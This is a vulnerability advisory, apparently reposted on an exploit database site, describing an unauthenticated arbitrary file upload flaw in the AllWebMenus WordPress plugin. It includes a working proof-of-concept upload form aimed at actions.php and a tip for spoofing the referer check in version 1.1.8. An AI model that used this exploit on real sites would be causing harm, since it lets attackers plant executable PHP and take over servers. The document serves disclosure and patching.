AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload

2012.01.23
Credit: 6Scan
Risk: High
Local: No
Remote: Yes
CWE: N/A

#Exploit Title: AllWebMenus WordPress Menu Plugin Arbitrary file upload #Version: < 1.1.9 #Date: 2012-01-19 #Author: 6Scan (http://6scan.com) security team #Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/ #Official fix: This advisory is released after the vendor was contacted and fixed the issue promptly. #Description: Unauthorized users could upload arbitrary files to the vulnerable server, potentially executing commands AllWebMenus WordPress Menu Plugin <1.1.8 Remote File upload On versions < 1.1.8 , lack of checks in script actions.php allowed malicious user to upload any file to the vulnerable server. Create a file (For example, Wordpress_security.php , with this content <?php echo '6Scan to the rescue'; ?> ) Compress it with zip to awm.zip Use this form to upload the php file to the server <form action="http://server/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php" method=post enctype="multipart/form-data"> <input type="file" name="awm1" size=100> <input type="hidden" name="AWM_menu_id" value="2134234"> <input type="hidden" name="theaction" value="zip_update"> <input type=submit> </form> Version 1.1.8 also checks the source referrer, so you have to use scripting language (or spoof it in another way) to set the HTTP_REFERER to "wp-admin/options-general.php?page=allwebmenus-wordpress-menu-plugin/allwebmenus-wordpress-menu.php"

References:

http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top